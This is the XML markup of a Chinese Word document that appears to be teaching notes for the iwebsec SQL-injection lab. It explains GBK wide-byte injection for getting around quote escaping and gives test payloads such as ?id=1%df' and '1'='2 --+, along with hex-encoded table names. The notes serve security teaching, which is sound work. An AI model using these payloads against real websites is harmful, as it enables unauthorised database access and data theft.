        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DC10AF" w14:textId="77777777" w:rsidR="004A1A82" w:rsidRDefault="004A1A82" w:rsidP="004A1A82"/>
    <w:p w14:paraId="3678D434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>小工具（你以后自己转字符串）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5471A56F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>在线十六进制编码：把字符串转成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的格式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E4654C" w14:textId="77777777" w:rsidR="004A1A82" w:rsidRDefault="004A1A82" w:rsidP="004A1A82"/>
    <w:p w14:paraId="230EE383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iwebsec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0x69776562736563</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3AD656" w14:textId="77777777" w:rsidR="004A1A82" w:rsidRDefault="004A1A82" w:rsidP="004A1A82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    users </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x7573657273</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B7DBC" w14:textId="253D4822" w:rsidR="004A1A82" w:rsidRPr="004A1A82" w:rsidRDefault="004A1A82" w:rsidP="004A1A82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288205DD" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>四、核心原理总结（教学重点）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555A0240" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>为什么</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ?id=1' and '1'='2 </w:t>
      </w:r>
      <w:r>
        <w:t>正常返回数据？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB158B3" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>核心原因：后端对单引号做了转义，导致单引号失去闭合能力，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t>逻辑被当作字符串，无法生效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E466C82" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>关键结论：标准字符型注入</w:t>
      </w:r>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:t>失效，必须用宽字节注入绕过转义</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF67AFF" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>字符型注入的两种场景对比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0"/>
        <w:gridCol w:w="2070"/>
        <w:gridCol w:w="2070"/>
        <w:gridCol w:w="2070"/>
      </w:tblGrid>
      <w:tr w:rsidR="005D0D0E" w14:paraId="62AA6DC5" w14:textId="77777777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3631DF" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t>场景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973305" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t>单引号测试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26AB7E" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t xml:space="preserve">and '1'='2 </w:t>
            </w:r>
            <w:r>
              <w:t>测试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C0F6C" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t>注入方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D0D0E" w14:paraId="66D44ED8" w14:textId="77777777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44EA5C" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t>无转义字符型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71B8F7" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t xml:space="preserve">?id=1' </w:t>
            </w:r>
            <w:r>
              <w:t>报错</w:t>
            </w:r>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>无数据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79A742" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t>无数据返回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D97CFE" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t>标准字符型</w:t>
            </w:r>
            <w:r>
              <w:t>Payload</w:t>
            </w:r>
            <w:r>
              <w:t>（</w:t>
            </w:r>
            <w:r>
              <w:t>-1' union ... --+</w:t>
            </w:r>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D0D0E" w14:paraId="517BE13A" w14:textId="77777777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BD32AB" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t>有转义字符型（本场景）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336A77" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t xml:space="preserve">?id=1' </w:t>
            </w:r>
            <w:r>
              <w:t>正常返回数据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B7A897" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t>正常返回数据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EA9961" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t>宽字节注入（</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">%df' </w:t>
            </w:r>
            <w:r>
              <w:t>绕过转义）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40493499" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>宽字节注入的本质</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29266CD1" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>利用编码不一致漏洞：数据库编码为</w:t>
      </w:r>
      <w:r>
        <w:t>GBK</w:t>
      </w:r>
      <w:r>
        <w:t>（多字节），后端仅对单引号做单字节转义</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D734188" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> %df' </w:t>
      </w:r>
      <w:r>
        <w:t>被转义为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> %df%5c%27</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">%df%5c </w:t>
      </w:r>
      <w:r>
        <w:t>被解析为</w:t>
      </w:r>
      <w:r>
        <w:t>GBK</w:t>
      </w:r>
      <w:r>
        <w:t>汉字，剩余</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> %27 </w:t>
      </w:r>
      <w:r>
        <w:t>为单引号，成功闭合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E3BA25" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>仅适用于</w:t>
      </w:r>
      <w:r>
        <w:t>GBK</w:t>
      </w:r>
      <w:r>
        <w:t>等多字节编码，是字符型注入转义绕过的经典方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EC19AA" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="005D0D0E"/>
    <w:p w14:paraId="5AF67EE8" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>五、下一步操作建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A4B761" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>先执行宽字节验证</w:t>
      </w:r>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>?id=1%df' and '1'='2 --+</w:t>
      </w:r>
      <w:r>
        <w:t>，若页面无数据，确认转义被绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F58CF35" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>执行宽字节</w:t>
      </w:r>
      <w:r>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t>注入：使用上面的</w:t>
      </w:r>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:t>，完成靶场注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B51ECA8" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>教学补充：将此场景作为「字符型注入</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t>转义绕过」的典型案例，训练学生的实战排错能力</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301B8CAC" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="005D0D0E">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005D0D0E">
      <w:headerReference w:type="default" r:id="rId6"/>
      <w:footerReference w:type="default" r:id="rId7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5A2A2" w14:textId="77777777" w:rsidR="00E96282" w:rsidRDefault="00E96282">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="07C96908" w14:textId="77777777" w:rsidR="00E96282" w:rsidRDefault="00E9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4443B" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="005D0D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4712E" w14:textId="77777777" w:rsidR="00E96282" w:rsidRDefault="00E96282">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="78DFAFE1" w14:textId="77777777" w:rsidR="00E96282" w:rsidRDefault="00E96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45E0F" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="005D0D0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D0E"/>
    <w:rsid w:val="004A1A82"/>
    <w:rsid w:val="005D0D0E"/>
    <w:rsid w:val="005D66DC"/>
    <w:rsid w:val="00E96282"/>
    <w:rsid w:val="0ED537A0"/>
    <w:rsid w:val="362A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C9FBE"/>
  <w15:docId w15:val="{53922293-89B7-4F79-997B-828B6EB9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1172</Words>
  <Characters>6685</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>55</Lines>
  <Paragraphs>15</Paragraphs>
  <ScaleCrop>false</ScaleCrop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LTSC</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-07T02:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-09T07:06:00Z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D587B06A8F664ED19618476C211F8332_13</vt:lpwstr>
  </property>
</Properties>
</file>